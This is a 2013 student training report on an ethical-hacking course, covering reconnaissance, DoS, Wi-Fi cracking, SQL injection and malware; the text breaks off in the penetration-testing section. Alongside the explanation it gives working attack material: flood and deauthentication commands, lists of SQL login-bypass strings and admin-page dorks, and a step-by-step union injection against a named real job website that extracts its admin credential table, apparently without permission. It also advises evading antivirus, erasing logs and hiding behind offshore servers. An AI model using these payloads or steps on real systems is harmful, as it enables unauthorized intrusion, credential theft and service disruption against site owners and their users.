2013

Report On Topic

Raghav Bisht
7/16/2013
 SEMINAR ON INDUSTRIAL TRAINING
(June-July, 2013)

Certified Ethical Hacker

(CEH)

Submitted by

Raghav Bisht

Under the Guidance of

Mr. Mohit Yadav

(Co-Founder & Managing Director)

Discipline of CSE/IT

Bharath University, Agharam Road Selaiyur, Chennai

June-July, 2013
 DECLARATION 2013

I hereby declare that I have completed my six weeks summer training at Bytec0de Securities
PVT. LTD from 25th May 2013 to 25th July 2013 under the guidance of Mr. Mohit Yadav. I
have worked with full dedication during these six weeks and my learning outcomes fulfill the
requirements of training.

Name of Student: Raghav Bisht

Date: 7/16/2013
 Acknowledgement 2013

“TO MY NATION INDIA AND LOVING GOD”

I am happy to present this report to my Department of CSE/IT.

I would like to acknowledge my trainer Mr. Mohit Yadav who gave me opportunity to develop
my hacking skills under their roof and all the other hackers who appreciate my work and
supported me till the end of my training.

A special thanks to Mr. Shorty420 & p7771 (Black hat) for sharing their work experience and
knowledge with me.

I wish to thanks my family and friends. Without them, I could not have completed my training.

I would also like to thank the people who directly or indirectly helped me on this term paper.

THANKING YOU
 Index 2013

 Organization overview
 Training Objective
 Course Outline
 Introduction to hacking and security
 Ethical hacking and IT security
 Technology aspects for IT security & ethical hacking
 Steps of hacking
 Dos & Ddos attack
 Wireless hacking
 SQL Injection
 Malware
 Pen testing
 Metasploit
 Reason for choosing CEH
 Gantt chart
 Bibliography
 Organization Overview 2013

Bytecode is an IT certifications and training company, an authorized/accredited training center

of EC-Council, there head quarter is completely based in New Delhi (INDIA), They started small
IT training and certifications related operations in 1st, February 2008 with virtual lab
environment and online training and In just a few years Bytecode has grown with a large number
of new students, clients and partners and they have successfully trained and certified more than
15000 (fifteen thousands) students across the world.

From the starting they only deliver the best quality and knowledge base solutions with a very
high standard to their students, clients and partners. Bytecode believes in teamwork, with every
new day the quest for acquiring new competencies continues. Forever searching, experimenting,
innovating, learning, moving ahead with our sincere efforts and dedication, shaping the future,
and challenging our competencies to create new opportunities, is a never-ending process in the
company.

They have successfully deliver training and workshop related services to the govt. departments,
corporate, institutions and other giants Indian engineering colleges and schools.

They highly provide the certifications and training services for giants such as:

 EC-Council: Security5, CEH v8, ECSA, LPT, CHFI, CEI, ENSA

 CISCO: CCNA, CCNP, CCVP, CCSP, CCIE
 Redhat: RHCE, RHCA, RHCSA, RHCVA, RHCSS, RHCDS
 Comptia: Security+, A+, N+, Server+, Linux+, Server+, CASP, CTP
 CHECKPOINT: CCSA, CCSE
 ISACA: CISM, CISA
 ISC2: CISSP
 Microsoft: MCSE, MCSA, MCTS, MCITP, MCPD

Location:

Bytecode Cyber Security (P) Limited

Head Quarter : 72-B, III Floor,

Main Vikas Marg, Laxmi Nagar,

New Delhi - 110092

Near Nirman Vihar Metro Station ( Opp. Metro Pillar No.50 )

Training Objective 2013

 Importance of information security in today’s

world.
 Elements of security.
 Various phases of the Hacking Cycle.
 Types of hacker attacks.
 Hacktivism.
 Ethical hacking.
 Vulnerability research and tools.
 Steps for conducting ethical hacking.
 Computer crimes and implications.
 Course Outline 2013

1. Introduction to Ethical Hacking

2. Foot printing
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web-based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Linux Hacking
19. Evading IDS, Firewalls, and Honey-pots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing
Introduction to Hacking & Security 2013

1. What is hacking?
Hacking is a process to bypass the security mechanisms of information system or
network. Hacking is done in step partly by creative thinking and partly by using
different tools at a time.
Or,
Hacking is an unauthorized use of computer and network resources. Most people
think that hackers are computer criminals. They fail to recognize the fact that
criminals and hackers are two total different things. Media is responsible for this.
Hackers in reality are actually good and extremely intelligent people who by using
their knowledge in a constructive manner help organizations, companies,
government, etc. to secure documents and secret information on the internet.
So, hackers, as popularly defined, are computer experts who spend enormous
amount of time trying to breach the security of networks, web servers and emails.
Usually they use selection of specialist software to identify weakness, which are
then exploited.
The majority do it for fun and as a challenge. They’re not interested in attacking
private individuals. It’s the big companies and authorities they go for.
There are just two aspects of hacking that you have to worry about as a private
individual. One is that your details are on various company databases, and when
they are cracked, information about you can be stolen.

2. Understanding the need to hack your

own systems
To catch a thief, think like a thief. That’s the basis for ethical hacking. The law of
averages works against security. With the increased number and expanding
knowledge of hackers combined with the growing number of system
Vulnerabilities and other unknowns, the time will come when all computer systems
are hacked or compromised in some way.

3. So our overall goals as an ethical

hacker should be as follows:

 Hack your systems in a nondestructive fashion.

 Enumerate vulnerabilities and, if necessary, prove to management that
vulnerabilities exit and can be exploited.
 Apply results to remove the vulnerabilities and better secure your system.

4. What is computer security?

Security is process not product. The objective of computer security includes
protection of information and property from theft, corruption, or natural disaster,
while allowing the information and property to remain accessible use to minimize
the security threads.

5. What hacker can do?

 Hacker can enter any remote system to get all information without any
trace.
 Hack any email password, website, and take down network with help of
ddos attack.
 Hacker can break any password.
 Hacker can call to anyone without tracing.
Ethical Hacking & IT Security 2013

Ethical hacking & IT security requirements are different from each person, like a
normal computer user want to protect their information’s from virus, etc and a
student want to break his friends email accounts, college teachers accounts and
valuable information’s as per their needs.
System administrators want to maintain information’s safely from outside and
inside attacks. Also maintain logs threads to investigate an attack.
A business man wants to protect their information’s securely from outside and
inside attacks, some of businessman interested in intelligence on competitors for
their business benefits, following are others interests:
1. To protect the sensitive information’s in the company’s database. A
company’s database will usually not just contain information about company
itself, but also data about its clients and employees. As such, should
malicious hackers be able to breach the system, they could very well get
their hands on information involving a lot of people in one go.
2. To protect the database itself. Malicious hackers may not just steal the
information in your system. To add insult to injury, they can also send
viruses into your system that could very well corrupt it and wipe out
everything in your database. This means the company losing a lot of very
important information.
3. To protect a business interests of the company. If the database of a company
is left unsecured and malicious hackers are able to gain access to the
information in it, the company can very well lose the respect of its clients,
partners and the business worlds.
A forensic analysist want to investigate cyber cases to find out cyber criminals so
he need latest technology to solve all issues in minimum time and penetration
testers want to find loopholes in software’s or network services to reduce risk.
A black hat hacker want to steal TOP SECRET information’s from business and
military computers for different agenda, now everything is depend on
information’s it may be for national security or war plans etc, like China is more
interested to steel valuable information’s from USA, India, South Korea, Japan,
Thailand, Vietnam, etc
1. IT act / laws
Each country has their own cyber law to prevent, monitor and investigate cyber
crime.
Now a day’s cyber criminal understands the complexity of laws and their effects.
Also some country has tight security on gateway level using their own central
monitoring system like China, Russia, India, etc.

India:
India does not have any “lawful interception law”. All it has is the
“unconstitutional” provisions of the information technology act 2000 (through IT
act 2008 amendments). Through these amendments, the cyber law of India has
been made an “instrumentality” of e-surveillance in India. There are no procedural
safeguards that can prevent the illegal and unconstitutional e-surveillance activities
in India.
The only resource for Indians in such circumstances is to use “self defense” and
prevent the illegal and unconstitutional encroachment upon their “civil liberties”
like right to privacy. You can do the following:
1. Use disposable e-mails to avoid e-mail surveillance.
2. Use safeguards like TOR against illegal internet eavesdropping and
sniffing.
3. Use TOR for instant messaging and mobile phones for private and secure
conversation.
4. For blackberry users and those believing in a good combination of
privacy and security, use pretty good privacy along with any good smart
phone. This way you can have a better and e-surveillance free mobile
infrastructure then the feature controversial blackberry phones.
5. Use Enigmail for encrypted emails.

Recently, the United Nations declared “right to access” to internet as human right.
This would have a positive impact upon many human rights in cyber-space. For
instance, right to speech and expression, right to privacy, right to know, etc cannot
be violated by the CMS project of India. United Nations must expand Human
Rights Protection to many more issues.
This is the real problem for the CMS project of India. We have no dedicated
privacy laws in India, Data security laws in India and data protection law in India.
Further, the CMS project of India is also beyond the “Parliamentary Security”. The
cyber law of India, incorporated in the information technology act 2000, was
drastically amended through the information technology amendment act 2008.
The IT act 2008 incorporated various “unconstitutional provisions” in the cyber
law of India that clearly violates the human rights in cyberspace. For instance,
provisions regarding internet censorship, website blocking, encryption and
decryption, etc have no inbuilt “procedural safeguards” as mandated by the
constitution of India. This is the reason why the cyber law of India needs to be
repealed.
Further we have no E-Surveillance policy in India. Even phone tapping in India is
done in an “Unconstitutional manner” and even by private individuals with or
without governmental approval.
If CMS project of India has to be legal has to be “legal and constitutional” it must
be subject to “parliamentary oversight”. Further, the IT act 2000 must be repealed
as soon as possible as it is clearly not in conformity with the constitution of India
and civil liberties protection in cyberspace.
The golden shield project colloquially referred to as the great firewall of china is a
censorship and surveillance project operated by the ministry of public security
division of the government of the people’s republic of china. The project was
initiated in 1998 and began operations in November 2003.
“Individuals are prohibited from using the internet to: harm national security;
disclose state secrets; or injure the interests of the state or society. Users are
prohibited from using the internet to create, replicate, retrieve, or transmit
information that in-cities resistance to the PRC Constitutions, laws, or
administrative regulations; promotes the overthrow of the government or socialist
system; undermines national unification; distorts the truth, spreads rumors, or
destroys social order; or provides sexually suggestive material or encourages
gambling, violence, or murder. Users are prohibited from engaging in activities
that harm the security of computer information networks and from using networks
or changing network resources without prior approval”
Purpose of the project is to block content by preventing IP address from being
routed through and consist of standard firewalls and proxy server at the internet
gateways. Through DNS cache poisoning it’s possible to make unreachable
specific website are requested.
In Oct. 2001, Greg Walton of the International centre for human rights and
domestic development published a report; he wrote:

Old style censorship is being replaced with a massive, ubiquitous architecture of

surveillance: the Golden Shield. Ultimately, the aim is to integrate a gigantic
online database with an all-encompassing surveillance network-incorporating
speech and face recognition, closed-circuit television, smart cards, credit records,
and Internet surveillance technologies.
China has implemented most sophisticated Internet content filtering that is able to
effectively filter content using multiple methods of regulation and technical
controls:

1. IP blocking and content filtering

2. DNS and URL filtering
3. DNS poisoning
This is a real battle in the cyber space that involves the world’s largest online
population and weapon created by Chinese government is an advanced Internet
censorship? We can categorize the censored content as
1. Websites belonging to outlawed or suppressed groups
2. Sites related to the hostiles government, media, or other
organizations deemed as subversive
3. Sites related to religious content any pornography websites or sites
that encourage criminal activity
 4. Blogging sites
The Chinese model is a reference for all the others authoritarian regimes but not
only for them. We are assisting to a challenge engaged by governments worldwide
like USA that desire to legislate cyber space and impose their control to prevent
any form of terrorism and dissents. We are observing a growing trend toward
internet censorship in a range of countries that are investing in the necessary
technology to implement the control. The technologies are exactly the same used to
secure network infrastructure from attack.
Some commonly used technical methods for censoring are:

1. IP blocking
IP blocking is a form of security used on mail, Web or any other Internet servers to
block connections from a specific IP address or range of addresses that are
considered undesirable or hostile. For example, a Web site forum administrator
who sees spam or unwanted posts from a user may block that user's IP address to
prevent them from using the discussion board.
Blacklist: In Internet terminology, a generic name for a list of e-mail addresses or
IP addresses that are originating with known spammers. Individuals and enterprises
can use blacklists to filter out unwanted e-mails, as most e-mail applications today
have filtering capabilities.

2. DNS filtering and redirection

Doesn’t resolve domain names, or returns incorrect IP addresses. This affects
all IP protocols such as HTTP, FTP, or POP. A typical circumvention method is
to find a domain name server that resolve domain names correctly, but domain
name servers are subject to blockage as well, especially IP blocking. Another
workaround is to bypass DNS if the IP address is obtainable from another
sources and it not blocked. Examples are modifying the hosts file or typing the
IP address instead of the domain name in a web browser.
 3. URL filtering
Suppose you type the name of your favorite social networking site on the web
browser and it displays a message like “The policy of this organization doesn’t
allow you to browse that website” and does not let you access the site from
office, there is a URL filter that has been put in place by your IT department.
So, a URL filter is used to basically categorize the websites on the internet and
either allow/block the access to them to the web users of the organization either
by referring to an already categorized central database (maintained by URL
filtering vendors) or by classifying the websites in real time. URL filtering can
also be made applicable only during certain times of a day or days of a week, if
required.
Why is URL Filtering required?
URL filtering is required to stop the users of an organization from accessing those
websites during working hours that:

 Drains their productivity

 Lets them view objectionable content from work place
 Is bandwidth intensive and hence creates a strain on resources

4. Packet filtering
On the Internet, packet filtering is the process of passing or blocking packets at a
network interface based on source and destination addresses, ports, or protocols.
The process is used in conjunction with packet mangling and Network Address
Translation (NAT). Packet filtering is often part of a firewall program for
protecting a local network from unwanted intrusion. In a software firewall, packet
filtering is done by a program called a packet filter. The packet filter examines the
header of each packet based on a specific set of rules, and on that basis, decides to
prevent it from passing (called DROP) or allow it to pass (called ACCEPT).
Technology aspect for IT security & ethical hacking 2013

Story:
“In real war a solder must need to understandable all weapons and there timing
effect as per target to win the war in minimum time”
Same IT security and Ethical hacking we need to break Antivirus, Firewall, IDS,
and IPS for penetration testing or ethical hacking.

1. Antivirus
Effective antivirus software guards your computer from all forms of malware,
including traditional computer viruses, worms, Trojan horses and even
sophisticated, blended attacks. Not only does antivirus software detect and
eliminate any viruses or malware that may have already infected your hard drive,
many solutions that offer a free virus scan actively prevent new infections before
they have a chance to affect your computer. Antivirus software will scan and
analyze emails and files for infection as they are downloaded.
Using the method of signature-based detection, antivirus software checks a file's
contents against a dictionary of known virus signatures - a pattern of code that
uniquely identifies a virus. If a virus signature is found, the antivirus software will
remove the threat.
Antivirus software obviously detects potential threats in a few different ways. But
what about the latest and greatest viruses? Because people create new viruses
every day, an antivirus program will constantly update its dictionary of virus
signatures. Many antivirus software programs -- including those that offer free
virus protection -- also employ heuristic analysis, which can identify variants of
known malware - viruses that have been mutated or refined by attackers to create
different strains.

How antivirus work?

Before understand how antivirus work, first we need to understand how program
work in computer OS.
Each program is code of instructions for processing inputs/outputs. The final form
of code in zero/one (Binary Language).
Antivirus company build team and list of known RAT and virus builders and create
executable files and found the most common part of each executable that always
same by program, so antivirus company build signature database and used by
antivirus engine to prevent known VIRUS.
For Unknown antivirus used behavior pattern they check the behavior like date of
modification-file, installation location, visibility type, etc and block them as per
rating system like Norton SONAR is great example.

How to bypass antivirus?

To bypass antivirus we need to build new RAT or virus using own coding else we
need to modify exciting code using crypter, binders, packers, etc.
 2. Firewall
Firewall is second pyramiding of IT security unauthorized or unwanted
communications between computer networks or hosts.
A firewall is a set of related programs, located at a network gateway server that
protects the resources of a private network from users from other networks. (The
term also implies the security policy that is used with the programs.) An enterprise
with an intranet that allows its workers access to the wider Internet installs a
firewall to prevent outsiders from accessing its own private data resources and for
controlling what outside resources its own users have access to.
Basically, a firewall, working closely with a router program, examines each
network packet to determine whether to forward it toward its destination. A
firewall also includes or works with a proxy server that makes network requests on
behalf of workstation users. A firewall is often installed in a specially designated
computer separate from the rest of the network so that no incoming request can get
directly at private network resources.
There are a number of firewall screening methods. A simple one is to screen
requests to make sure they come from acceptable (previously identified) domain
name and Internet Protocol addresses. For mobile users, firewalls allow remote
access in to the private network by the use of secure logon procedures and
authentication certificates.
A number of companies make firewall products. Features include logging and
reporting, automatic alarms at given thresholds of attack, and a graphical user
interface for controlling the firewall.
Computer security borrows this term from firefighting, where it originated. In
firefighting, a firewall is a barrier established to prevent the spread of fire.

What does firewall do?

A firewall filters both inbound and outbound traffic. It can also manage public
access to private networked resources such as host applications. It can be used used
to log all attempts to enter the private network and trigger alarms when hostile or
unauthorized entry is attempted. Firewall can filter packets based on their source

And destination addresses and port numbers. This is known as address filtering.
Firewall can also filter specific type of network traffic. This is also known as
protocol filtering because the decision to forward or reject traffic is dependent
upon the protocol used, for example HTTP, ftp or telnet. Firewalls can also filter
traffic by packet attribute or state.

3. IDS (Intrusion Detection System)

An intrusion detection system (IDS) monitors network traffic and monitors for
suspicious activity and alerts the system or network administrator. In some cases
the IDS may also respond to anomalous or malicious traffic by taking action such
as blocking the user or source IP address from accessing the network.
IDS come in a variety of “flavors” and approach the goal of detecting suspicious
traffic in different ways. There are network based (NIDS) and host based (HIDS)
intrusion detection systems. There are IDS that detect based on looking for specific
signatures of known threats- similar to the way antivirus software typically detects
and protects against malware- and there are IDS that detect based on comparing
traffic patterns against a baseline and looking for anomalies. There are IDS that
simply monitor and alert and there are IDS that perform an action or actions in
response to a detected threat. We’ll cover each of these briefly.
There are three main types of IDS:
1. NIDS (Network Intrusion Detection System)
Network Intrusion Detection Systems are placed at a strategic point or points
within the network to monitor traffic to and from all devices on the network.
Ideally you would scan all inbound and outbound traffic; however doing so might
create a bottleneck that would impair the overall speed of the network.

2. HIDS (Host-based Intrusion Detection System)

Host Intrusion Detection Systems are run on individual hosts or devices on the
network. A HIDS monitors the inbound and outbound packets from the device only
and will alert the user or administrator of suspicious activity is detected

3. SIDS (Stack-based Intrusion Detection System)

A signature based IDS will monitor packets on the network and compare them
against a database of signatures or attributes from known malicious threats. This is
similar to the way most antivirus software detects malware. The issue is that there
will be a lag between a new threat being discovered in the wild and the signature
for detecting that threat being applied to your IDS. During that lag time your IDS
would be unable to detect the new threat.

4. Anomaly Based
An IDS which is anomaly based will monitor network traffic and compare it
against an established baseline. The baseline will identify what is “normal” for that
network- what sort of bandwidth is generally used, what protocols are used, what
ports and devices generally connect to each other- and alert the administrator or
user when traffic is detected which is anomalous, or significantly different, than
the baseline.
 5. IPS (Intrusion prevention system)
Intrusion prevention is a preemptive approach to network security used to identify
potential threats and respond to them swiftly. Like an intrusion detection system
(IDS), an intrusion prevention system (IPS) monitors network traffic. However,
because an exploit may be carried out very quickly after the attacker gains access,
intrusion prevention systems also have the ability to take immediate action, based
on a set of rules established by the network administrator. For example, an IPS
might drop a packet that it determines to be malicious and block all further traffic
from that IP address or port. Legitimate traffic, meanwhile, should be forwarded to
the recipient with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion
prevention system should also perform more complex monitoring and analysis,
such as watching and responding to traffic patterns as well as individual packets.
"Detection mechanisms can include address matching, HTTP string and substring
matching, generic pattern matching, TCP connection analysis, packet anomaly
detection, traffic anomaly detection and TCP/UDP port matching."
Broadly speaking, an intrusion prevention system can be said to include any
product or practice used to keep attackers from gaining access to your network,
such as firewalls and anti-virus software.
 Steps of Hacking 2013

1. Information gathering
This is a first step of hacking and penetration testing attack; first we collect all
information’s of target with help of tools and manual ways. Without much
information our success rate of attacks also low.
Manual Process:
1. Get URL using Google search.
2. Using whois sites.
5. www.who.is
6. www.robtex.com
7. www.domaintools.com
3. Get PDF and Document using Google special features:
8. Site:4share.com CISSP
9. Site:pastebin.com inurl:hack
10. Chemistry filetype:doc
11. http://www.googleguide.com/advanced_operators_refere
nce.html

Automated Process:
1. We use following tools for information gathering:
12. Uberharvest
13. theharvester.py
14. metaGooFii
15. Web Data Extractors ( Email-Phone no Extractors )
16. Maltego

2. People Search:

 pipl.com
 anywho.com
 address.com
 Social networking sites (facebook, linedin, twitter)
  Job Sites [ dice.com, monster.com,naukri.com ]
3. Phone Number

 truecaller.com
 kgdetective.com
 phunwa.com

4. Trace route Tools

 Vtrace [ www.vtrace.pl ]
 Trout [ www.foundstone.com ]
 tracert , traceroute [ commands ]

5. Email IP Tracking
 wspy.org
 Emailtrackerpro.com
 Readnotify.com
 Politemail.com

2. Scanning & Banner Grabbing

After getting information of target user we need to know OS type, version of
application that are running on open PORTS etc to successful exploitation.
Following tools we need to use:
1. Port & network scanning:
Port and networking scanning is used to know open port and active Pc in network.
 Nmap
 Angry IP scanner
 Hping

2. Banner Grabbing:
Banner grabbing is a process to know exact version of target application to search
loopholes or exploits or zero day.
 Telnet
 ID serve

3. Vulnerability Scanning
This step is used to find out loopholes in applications using tools, after we use
public and private exploit to enter on target system remotely.
Vulnerability scanner:
 Acunetix
 netsparke
 nessus
 gfi languard
 Whatweb [ Find out web application ][ Backtrack Tool ]
E.g.: ./whatweb bytec0de.com
 zoomscan [ scan zoomla website ] [ /pentest/web/zoomscan ]
E.g.: ./joomscan.pl -u http://liclanka.com/
 Nikto:
E.g. ./nikto.pl -host liclanka.com
 Websecurifi
 Vega
 w3af
 webshag
After find out vulnerability we look for exploit we need to compile those using
their associated language and change shell code if required for connect back.
 4. Exploitation (Obtaining access)
Program exploitation is a staple of hacking. A program is made up of a complex
set of rules following a certain execution flow that ultimately tells the computer
what to do. Exploiting a program is simply a clever way of getting the computer to
do what you want it to do, even if the currently running program was designed to
prevent that action. Since a program can really only do what it’s designed to do,
the security holes are actually flaws or oversights in the design of the program or
the environment the program is running in. It takes a creative mind to find these
holes and to write programs that compensate for them. Sometimes these holes are
the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be
applied in many different places.

5. Maintaining access & erasing evidence

This is post phase to maintain future access on target system. We need to deploy
malware as per our requirement else we need to erase logs and evidence or use
offshore VPS for whole operations.
 Dos & Ddos Attacks 2013

1. Dos Attack
A "denial-of-service" attack is characterized by an explicit attempt by attackers to
prevent legitimate users of a service from using that service. Examples include
 attempts to "flood" a network, thereby preventing legitimate network traffic
 attempts to disrupt connections between two machines, thereby preventing
access to a service
 attempts to prevent a particular individual from accessing a service
 attempts to disrupt service to a specific system or person

It is an attempt to make a
machine or network resource unavailable to its intended users. Consuming all
resources given to person. Like Network bandwidth , all Type Of Memory etc.
 Ping Of Death
o ping -t -l 6550 google.com [ max buffer size = 65500 ]
o Effective system [ Solaris 2.4 , minix , win3.11,95 ]
 SYN-ATTACK
o Hping -i sudo hping3 -i u1 -S -p 80 192.168.1.1
 UDP/HTTP/TCP Flooding
o LOIC
o HOIC
  Smurf Attack
o make your own packet and flood on network
 pktbuilder
 packETH 1.6 (linux & windows)
 CDP Flooding (Cisco Discovery Protocol)
o yersinia [ backtrack ]
o Done on Cisco Switches & Routers
 MAC Flooding
o Flooding network switches
o ARP Spoofing
o Net cut [ Windows ]
o ettercap [ Backtrack ]
o Deauthentication Technique

2. Ddos Attack
DDOS, short for Distributed Denial of Service, is a type of DOS attack where
multiple compromised systems -- which are usually infected with a Trojan -- are
used to target a single system causing a Denial of Service (DoS) attack. Victims of
a DDoS attack consist of both the end targeted system and all systems maliciously
used and controlled by the hacker in the distributed attack.
According to this report on e-Security Planet, in a DDoS attack, the incoming
traffic flooding the victim originates from many different sources – potentially
hundreds of thousands or more. This effectively makes it impossible to stop the
attack simply by blocking a single IP address; plus, it is very difficult to distinguish
legitimate user traffic from attack traffic when spread across so many points of
origin.
Distribution of attack techniques: January 2013

Distribution of attack techniques: April 2013

 Wireless hacking 2013

Wireless networks broadcast their packets using radio frequency or optical

wavelengths. A modern laptop computer can listen in. Worse, an attacker can
manufacture new packets on the fly and persuade wireless stations to accept his
packets as legitimate.
The step by step procedure in wireless hacking can be explained with help of
different topics as follows:-
1. Stations and Access Points :- A wireless network interface card (adapter) is
a device, called a station, providing the network physical layer over a radio
link to another station. An access point (AP) is a station that provides frame
distribution service to stations associated with it. The AP itself is typically
connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set
Identifier (SSID) that is also commonly called a network name. The SSID is
used to segment the airwaves for usage.
2. Channels :- The stations communicate with each other using radio
frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5
MHz apart. Two wireless networks using neighboring channels may
interfere with each other.
3. Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption
system used to encrypt packets transmitted between a station and an AP. The
WEP algorithm is intended to protect wireless communication from
eavesdropping. A secondary function of WEP is to prevent unauthorized
access to a wireless network. WEP encrypts the payload of data packets.
Management and control frames are always transmitted in the clear. WEP
uses the RC4 encryption algorithm.
4. Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A
(packet) sniffer is a program that intercepts and decodes network traffic
broadcast through a medium. It is easier to sniff wireless networks than
wired ones. Sniffing can also help find the easy kill as in scanning for open
access points that allow anyone to connect, or capturing the passwords used
in a connection session that does not even use WEP, or in telnet, rlogin and
ftp connections.
Steps for hacking Wi-Fi:
 airmon-ng start wlan0
 airodump-ng mon0
 airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w bytecodelab mon0
 aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
 aircrack-ng bytecodelab.cap
 Sql Injection 2013

1. What is Sql injection attack?

A SQL Injection attack is a form of attack that comes from user input that has not
been checked to see that it is valid. The objective is to fool the database system
into running malicious code that will reveal sensitive information or otherwise
compromise the server.
SQL injection is a technique used to take advantage of non-validated input
vulnerabilities to pass SQL commands through a Web application for execution by
a backend database. Attackers take advantage of the fact that programmers often
chain together SQL commands with user-provided parameters, and can therefore
embed SQL commands inside these parameters. The result is that the attacker can
execute arbitrary SQL queries and/or commands on the backend database server
through the Web application.

1. MYSQL Injection
 Dorks Code
o inurl:admin.asp
o inurl:login/admin.asp
o inurl:admin/login.asp
o inurl:adminlogin.asp
o inurl:adminhome.asp
o inurl:admin_login.asp
o inurl:administrator_login.asp

I am going to use:
Code:
http://site.com/Admin_Login.asp

 Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

Password ’ or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use
admin panel.

2. Advance Sql injection

Eg. Of advance Sql injection:
Target : http://www.naukriguru.com
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 100
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 10
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 20
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 50
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 40
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 30
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 35
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 33
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 32
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 31
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
,30,31—
  http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
9,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31 from information_schema.tables where table_schema =
database()—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31 from information_schema.columns where table_name =
0x6e675f61646d696e—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from
ng_admin—
 http://www.naukriguru.com/admin/
 http://www.naukriguru.com/admin/index.php#
 http://www.naukriguru.com/admin/add_industry.php
Tool used for Sql injection are:
 Havij v1.15
 Sql map
 Bsql hacker
 Pangolin
 Absinthe
 Malware 2013

This is a big catchall phrase that covers all sorts of software with nasty intent. Not
buggy software, not programs you don’t like, but software which is specifically
written with the intent to harm.
Virus:
This is a specific type of malware that spreads itself once it’s initially run. It’s
different from other types of malware because it can either be like a parasite that
attaches to good files on your machine, or it can be self-contained and search out
other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the
kind that move around on their own. In the malware sense, they’re viruses that are
self-contained (they don’t attach themselves like a parasite) and go around
searching out other machines to infect.
Trojan:
Do you remember that story you had to read in high school about the big wooden
horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but it
turns out that it’s neither fun nor important, and it’s now doing nasty things to your
machine.
Penetration Testing 2013

Introduction:

1. What is penetration testing?

A penetration testing is a method of evaluating the security of a computer
system or a network by simulating an attack from a malicious source, known
as black hat hackers, or crackers. The process involves an active analysis of
the system from any potential vulnerabilities that may result from poor or
improper system configuration, known and/or unknown hardware or
software flaws, or operational weakness in process or technical
countermeasures.

2. Why conduct a penetration testing?

From a business perspective, penetration testing helps safeguard your
organization against failure, through:
 Preventing financial loss through fraud or through lost revenue due to
unreliable business system and processes.
 Proving due diligence and compliance to your industry regulators,
customers and shareholders.
 Protecting your brand by avoiding loss of consumer confidence and
business reputation.
3. What can be tested?
All part where organization captures, store and processes information can be
assessed like the system where the information is stored in, the transmission
channels that transport it, and the processes and personnel that manages it,
Examples of areas that are commonly tested are:
